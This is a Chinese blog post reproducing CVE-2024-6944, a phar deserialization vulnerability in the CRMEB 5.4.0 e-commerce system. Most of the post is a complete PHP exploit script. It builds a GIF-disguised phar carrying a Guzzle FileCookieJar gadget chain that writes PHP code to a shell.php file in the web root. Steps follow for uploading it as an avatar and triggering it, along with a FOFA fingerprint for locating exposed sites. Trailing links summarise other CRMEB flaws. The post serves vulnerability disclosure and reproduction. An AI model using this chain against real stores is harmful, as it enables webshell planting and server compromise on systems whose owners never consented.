CRMEB电商系统PublicController.php反序列化漏洞(CVE-2024-6944)

于 2025-05-16 15:21:03 发布
阅读量279 收藏
点赞数 1
CC 4.0 BY-SA版权
文章标签: php 开发语言 数据库 安全威胁分析 web安全 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/jd_cx/article/details/148007761

问题描述

电商系统CRMEB 5.4.0版本中发现一个关键漏洞。受影响的是PublicController.php文件中的get_image_base64函数。参数文件的操作会导致反序列化。攻击可能远程发起。该漏洞已被公开披露并可能被利用。

fofa

icon_hash="-847565074"

漏洞复现

生成phar文件并gzip压缩

<?php

namespace GuzzleHttp\Cookie{

    class SetCookie {

        function __construct()
        {
            $this->data['Expires'] = '<?php phpinfo();?>';
            $this->data['Discard'] = 0;
        }
    }

    class CookieJar{
        private $cookies = [];
        private $strictMode;
        function __construct() {
            $this->cookies[] = new SetCookie();
        }
    }

    class FileCookieJar extends CookieJar {
        private $filename;
        private $storeSessionCookies;
        function __construct() {
            parent::__construct();
            $this->filename = "D:/phpstudy/WWW/crmeb/public/shell.php";
            $this->storeSessionCookies = true;
        }
    }
}

namespace{
    $exp = new GuzzleHttp\Cookie\FileCookieJar();

    $phar = new Phar('test.phar');
    $phar -> stopBuffering();
    $phar->setStub("GIF89a"."<?php __HALT_COMPILER(); ?>"); 
    $phar -> addFromString('test.txt','test');
    $phar -> setMetadata($exp);
    $phar -> stopBuffering();
    rename('test.phar','test.jpg');
}

?>

gzip压缩文件

gzip test.jpg

注册用户上传头像

触发phar反序列化

成功写入

漏洞来源

Sword-heart
关注
CRMEB 任意文件下载漏洞复现复现CVE-2024-52726)(附脚本)
iSee857的博客
03-18 540
   CRMEB开源商城系统 存在任意文件下载漏洞,未授权的攻击者可获取数据库敏感信息。​​​​​​​(CVE-2024-52726)
CRMEB开源电商系统 /api/products SQL注入漏洞复现(CVE-2024-36837)
0xSec
06-17 2393
2024年6月,CRMEB开源电商系统发布了新补丁,修复了一处SQL注入漏洞CVE-2024-36837)。经分析,该漏洞可以通过请求api的路径接口来进行SQL注入,进而可能导致敏感信息泄露,该注入可暴露后台web绝对路径,深入利用可获取服务器权限,该漏洞无前置条件且利用简单,建议受影响的用户尽快修复漏洞
漏洞复现CRMEB开源商城v5.2.2——ProductController.php——SQL注入
LongL_GuYu的博客
07-10 2575
CRMEB开源商城系统是一款全开源可商用的系统,它支持前后端分离开发,并且100%开源,适用于小程序、公众号、H5、APP、PC端等多种平台。其`v5.2.2`版本存在sql注入漏洞,允许远程攻击者通过 `ProductController.php` 文件中的 `getProductList` 函数获取敏感信息。
CRMEB多端多语言系统文件上传0Day代审历程
土豆的博客
09-05 2965
这两天攻防中,某政局子公司官网后台采用的CRMEB开源商城CMS,挺奇葩,别问怎么总让我碰到这种东西,我也不知道,主打的就是一个魔幻、抽象。最后通过审代码,绕过历史漏洞修复的补丁(文章内容可能有点少,没办法,这个代审快到了我只用了5秒)
漏洞复现-CRMEB 开源商城 sid 参数 SQL 注入漏洞
最新发布
玄道的网安博客
08-12 1192
是使用extractvalue()函数从数据库中提取数据,并检查提取的数据,当与MD5进行哈希时,是否与特定的哈希值匹配。CRMEB打通版v4是免费开源商城系统,UINAPP+thinkphp6框架商城.CRMEB打通版/api/products路径下的sid参数存在未经过滤的SQL语句拼接导致SQL注入。攻击者除了可以利⽤ SQL 注⼊漏洞获取数据库中的信息(例如,管理员后台密码、站点的⽤户个⼈信息)之外,甚⾄在⾼权限的情况可向服务器中写⼊⽊⻢,进⼀步获取服务器系统权限。披露日期:2023/10/9。
CRMEB apiwechatapp_auth 权限绕过漏洞CVE-2023-3232)
weixin_68999845的博客
09-21 3572
1.下载源码到本地,用phpstudy运行即可:https://github.com/crmeb/CRMEB。通过/api/wechat/app_auth,输入body即可得到token。源码下载url:https://github.com/crmeb/CRMEB。·漏洞名称:CRMEB apiwechatapp_auth 权限绕过漏洞。/api/wechat/app_auth处进行严格限制。·漏洞威胁等级:CVE-2023-3232。·漏洞编号:CVE-2023-3232。·漏洞类型:权限绕过漏洞
c#mvc上传文件保存到后台_【安全漏洞通告】CRMEB知识付费系统后台存在文件上传漏洞...
weixin_39844880的博客
12-25 590
安全漏洞通告INFORMATIONCRMEB知识付费系统后台存在文件上传漏洞01漏洞背景西安众邦网络科技有限公司以网站建设、微信公众号、微信商城以及O2O商城为核心业务,专注于创意设计和传播应用。CRMEB知识付费系统由西安众邦科技基于ThinkPhp5.0+vue+layui开发,具有自主知识产权。该系统后台用form-builder PHP快速生成现代化表单应用、ECharts实现完...
Jackson 最新反序列化漏洞(CVE-2019-14361和CVE-2019-14439)
05-08
Jackson官方github仓库发布安全issue,涉及漏洞CVE-2019-14361和CVE-2019-14439,均是针对CVE-2019-12384漏洞的绕过利用方式,当用户提交一个精心构造的恶意JSON数据到WEB服务器端时,可导致远程任意代码执行。...
JBossMQJMS 反序列化漏洞CVE-2017-7504)漏洞利用工具
07-23
JBossMQJMS 反序列化漏洞CVE-2017-7504)是针对企业级Java消息服务(JMS)提供商JBossMQ的一个严重安全问题。该漏洞源于应用程序未能正确处理反序列化的对象,使得攻击者可以通过精心构造的恶意输入触发任意代码...
反序列化漏洞】关于反序列化漏洞的杂谈1 -- Apache Dubbo 反序列化漏洞 CVE-2023-29234
blackmagic的博客
07-26 1559
反序列化漏洞也被称为"unserialization vulnerability"。它存在于那些允许将对象从字符串或二进制数据转换回原始对象的应用程序中。反序列化漏洞的问题在于,恶意用户可以构造特殊的序列化数据,通过应用程序的反序列化过程来执行恶意代码。这可以导致应用程序在反序列化过程中执行任意的代码,包括读取、修改或删除应用程序的敏感数据,或者在应用程序上下文中执行不受控制的操作。
crmeb全部代码,请勿商用
07-07
crmeb全部代码,所有代码均在里面,请勿商用,里面有自己的一些见解修改可以参考,大家有意见可以评论一起研讨
一个jmx的小例子
07-22
用eclipse打开即可运行
Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271
11-11
Java反序列化漏洞是软件安全领域的一个重要话题,特别是在企业级应用服务器如Weblogic中,这类漏洞可能导致远程代码执行、系统权限提升等严重后果。工具"Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查...
crmeb docker环境搭建以及bug记录
weixin_41108896的博客
07-19 1246
环境搭建 全部文件 百度云链接:https://pan.baidu.com/s/1daLbCxQ-6Os2OJwQo7V1Ug 提取码:wsac 解压gz文件得到tar文件 gzip -d gz文件 2 docker load tar文件 3 docker images 看一下镜像名称 4 docker run -itd --name tt -p 8888:80 -v ...
1day CRMEB开源电商系统 products 接口处存在SQL注入
weixin_43167326的博客
06-18 766
CRMEB开源电商系统是遥遥领先的开源电商系统,框架采用Tp6+MySQL+elementUI+uniapp,商城系统可商用;前后台都支持风格切换,包含小程序商城、H5商城、公众号商城、App,支持多语言、分销、拼团、砍价、秒杀、优惠券、积分、抽奖、会员等级、小程序直播、页面DIY,前后端分离,方便二开,使用文档、接口文档、数据字典、代码生成、二开文档/视频教程。
SaaS CRM系统存在的五大安全漏洞
weixin_34258078的博客
07-04 839
软件即服务(SaaS)应用程序正在企业市场攻城掠地。知名调研机构IDC公司预测,到2018年,云应用程序将占到27.8%的市场份额。客户关系管理(CRM)工具尤其得益于基于云的集成架构,因为客户数据很容易收集起来,然后在整个企业进行共享。不过你在将敏感的客户数据和商业机密装入到SaaS系统之前,确实需要留意SaaS环境存在的几个安全漏洞。 1. 端点安全...
众邦科技CRMEB商城商业版任意文件写入getshell 0day
qq_63217130的博客
03-25 1694
可以看到也没有任何过滤导致可以向任意路径的文件写入任意内容 前提是知道密码config('filesystem.password') 由于没有限制密码输入 次数导致可以爆破。写入文件的接口 /adminapi/system/crud/save_file/:id 处理的代码如下。没有对传入参数的路径做任何过滤以及后缀的检查,导致可以在任意路径创建任意后缀的文件,因此可以再网站。但是内容会有默认的代码 再配合以下接口进行内容 修改(任意内容写入)两个接口配合即可写入任意代码导致。
thinkphp6.0漏洞复现
qq_44657899的博客
01-19 8654
环境搭建 我打算安装在kali上面,首先下载tp6到kali上 // 1. 下载composer.phar: curl -sS https://getcomposer.org/installer | php // 2. 将 composer 命令移动到bin目录,使之全局可用 mv composer.phar /usr/local/bin/composer // 3. 设置中国全量镜像,提升访问速度 composer config -g repo.packagist composer ht
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值